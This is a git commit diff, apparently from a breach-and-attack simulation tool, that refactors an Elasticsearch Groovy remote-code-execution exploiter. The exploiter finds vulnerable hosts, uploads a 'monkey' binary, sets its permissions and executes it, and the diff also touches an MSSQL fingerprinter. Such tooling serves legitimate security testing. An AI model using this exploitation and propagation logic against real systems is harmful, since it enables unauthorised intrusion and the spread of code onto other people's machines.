Refactored elastic for latest framework changes

This commit is contained in:
Vakaris 2018-08-18 16:49:33 +03:00
parent a54eedec11
commit 76523e7379
2 changed files with 10 additions and 20 deletions

View File

@ -8,11 +8,9 @@ import json
import logging import logging
import requests import requests
from network.elasticfinger import ES_SERVICE, ES_PORT from network.elasticfinger import ES_SERVICE, ES_PORT
from tools import get_target_monkey, HTTPTools, build_monkey_commandline, get_monkey_depth
from exploit.web_rce import WebRCE from exploit.web_rce import WebRCE
from model import WGET_HTTP_UPLOAD, POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED from model import WGET_HTTP_UPLOAD
import copy
import re import re
__author__ = 'danielg' __author__ = 'danielg'
@ -49,48 +47,42 @@ class ElasticGroovyExploiter(WebRCE):
if ES_SERVICE not in self.host.services: if ES_SERVICE not in self.host.services:
LOG.info("Host: %s doesn't have ES open" % self.host.ip_addr) LOG.info("Host: %s doesn't have ES open" % self.host.ip_addr)
return False return False
# We need a reference to the exploiter for WebRCE framework to use
exploiter = self.exploit
# Build url from host and elastic port(not https) # Build url from host and elastic port(not https)
urls = WebRCE.build_potential_urls(self.host, [[ES_PORT, False]], ['_search?pretty']) urls = self.build_potential_urls([[ES_PORT, False]], ['_search?pretty'])
vulnerable_urls = [] vulnerable_urls = []
for url in urls: for url in urls:
if WebRCE.check_if_exploitable(exploiter, url): if self.check_if_exploitable(url):
vulnerable_urls.append(url) vulnerable_urls.append(url)
self._exploit_info['vulnerable_urls'] = vulnerable_urls self._exploit_info['vulnerable_urls'] = vulnerable_urls
if not vulnerable_urls: if not vulnerable_urls:
return False return False
# Extra escaping required: if self.skip_exist and self.check_remote_files(vulnerable_urls[0]):
config = copy.deepcopy(self._config)
config.dropper_target_path_win_32 = r"C:\\\\Windows\\\\monkey32.exe"
config.dropper_target_path_win_64 = r"C:\\\\Windows\\\\monkey64.exe"
if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], config):
LOG.info("Host %s was already infected under the current configuration, done" % self.host) LOG.info("Host %s was already infected under the current configuration, done" % self.host)
return True return True
if not WebRCE.set_host_arch(self.host, exploiter, vulnerable_urls[0]): if not self.set_host_arch(vulnerable_urls[0]):
return False return False
commands = {'windows': self.RDP_CMDLINE_HTTP, commands = {'windows': self.RDP_CMDLINE_HTTP,
'linux': WGET_HTTP_UPLOAD} 'linux': WGET_HTTP_UPLOAD}
data = WebRCE.upload_monkey(self.host, config, exploiter, vulnerable_urls[0], commands) data = self.upload_monkey(vulnerable_urls[0], commands)
# We can't use 'if not' because response may be '' # We can't use 'if not' because response may be ''
if data is not False and data['response'] == False: if data is not False and data['response'] is False:
return False return False
if WebRCE.change_permissions(self.host, vulnerable_urls[0], exploiter, data['path']) == False: if self.change_permissions(vulnerable_urls[0], data['path']) is False:
return False return False
if WebRCE.execute_remote_monkey(self.host, vulnerable_urls[0], exploiter, data['path'], True) == False: if self.execute_remote_monkey(vulnerable_urls[0], data['path'], True) is False:
return False return False
return True return True
def exploit(self, url, command): def exploit(self, url, command):
command = re.sub(r"\\", r"\\\\\\\\", command)
payload = self.JAVA_CMD % command payload = self.JAVA_CMD % command
response = requests.get(url, data=payload) response = requests.get(url, data=payload)
result = self.get_results(response) result = self.get_results(response)

View File

@ -29,8 +29,6 @@ class MSSQLFinger(HostFinger):
Discovered server information written to the Host info struct. Discovered server information written to the Host info struct.
True if success, False otherwise. True if success, False otherwise.
""" """
# TODO remove auto-return
return False
assert isinstance(host, VictimHost) assert isinstance(host, VictimHost)
# Create a UDP socket and sets a timeout # Create a UDP socket and sets a timeout